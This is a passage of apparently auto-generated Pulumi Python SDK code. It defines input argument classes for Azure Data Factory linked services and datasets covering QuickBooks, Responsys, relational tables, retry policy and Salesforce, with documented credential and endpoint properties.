def access_token(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter(name="accessTokenSecret")
def access_token_secret(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The access token secret for OAuth 1.0 authentication.
"""
return pulumi.get(self, "access_token_secret")
@access_token_secret.setter
def access_token_secret(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "access_token_secret", value)
@property
@pulumi.getter(name="companyId")
def company_id(self) -> Any:
"""
The company ID of the QuickBooks company to authorize.
"""
return pulumi.get(self, "company_id")
@company_id.setter
def company_id(self, value: Any):
pulumi.set(self, "company_id", value)
@property
@pulumi.getter(name="consumerKey")
def consumer_key(self) -> Any:
"""
The consumer key for OAuth 1.0 authentication.
"""
return pulumi.get(self, "consumer_key")
@consumer_key.setter
def consumer_key(self, value: Any):
pulumi.set(self, "consumer_key", value)
@property
@pulumi.getter(name="consumerSecret")
def consumer_secret(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The consumer secret for OAuth 1.0 authentication.
"""
return pulumi.get(self, "consumer_secret")
@consumer_secret.setter
def consumer_secret(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "consumer_secret", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the QuickBooks server. (i.e. quickbooks.api.intuit.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@pulumi.input_type
class QuickBooksObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
QuickBooks server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'QuickBooksObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class RelationalTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_name: Optional[Any] = None):
"""
The relational table dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_name: The relational table name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'RelationalTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_name is not None:
pulumi.set(__self__, "table_name", table_name)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Optional[Any]:
"""
The relational table name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Optional[Any]):
pulumi.set(self, "table_name", value)
@pulumi.input_type
class ResponsysLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Responsys linked service.
:param Any client_id: The client ID associated with the Responsys application. Type: string (or Expression with resultType string).
:param Any endpoint: The endpoint of the Responsys server.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with the Responsys application. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Responsys')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with the Responsys application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Responsys server.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with the Responsys application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ResponsysObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Responsys dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ResponsysObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class RetryPolicyArgs:
def __init__(__self__, *,
count: Optional[Any] = None,
interval_in_seconds: Optional[pulumi.Input[int]] = None):
"""
Execution policy for an activity.
:param Any count: Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input[int] interval_in_seconds: Interval between retries in seconds. Default is 30.
"""
if count is not None:
pulumi.set(__self__, "count", count)
if interval_in_seconds is not None:
pulumi.set(__self__, "interval_in_seconds", interval_in_seconds)
@property
@pulumi.getter
def count(self) -> Optional[Any]:
"""
Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[Any]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="intervalInSeconds")
def interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Interval between retries in seconds. Default is 30.
"""
return pulumi.get(self, "interval_in_seconds")
@interval_in_seconds.setter
def interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_in_seconds", value)
@pulumi.input_type
class SalesforceLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
environment_url: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
security_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for Salesforce.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any environment_url: The URL of Salesforce instance. Default is 'https://login.salesforce.com'. To copy data from sandbox, specify 'https://test.salesforce.com'. To copy data from custom domain, specify, for example, 'https://[domain].my.salesforce.com'. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication of the Salesforce instance.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] security_token: The security token is required to remotely access Salesforce instance.
:param Any username: The username for Basic authentication of the Salesforce instance. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'Salesforce')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if environment_url is not None:
pulumi.set(__self__, "environment_url", environment_url)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if security_token is not None:
pulumi.set(__self__, "security_token", security_token)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="environmentUrl")
def environment_url(self) -> Optional[Any]:
"""
The URL of Salesforce instance. Default is 'https://login.salesforce.com'. To copy data from sandbox, specify 'https://test.salesforce.com'. To copy data from custom domain, specify, for example, 'https://[domain].my.salesforce.com'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "environment_url")
@environment_url.setter
def environment_url(self, value: Optional[Any]):
pulumi.set(self, "environment_url", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password for Basic authentication of the Salesforce instance.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="securityToken")
def security_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The security token is required to remotely access Salesforce instance.
"""
return pulumi.get(self, "security_token")
@security_token.setter
def security_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "security_token", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The username for Basic authentication of the Salesforce instance. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SalesforceMarketingCloudLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Salesforce Marketing Cloud linked service.
:param Any client_id: The client ID associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "type", 'SalesforceMarketingCloud')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
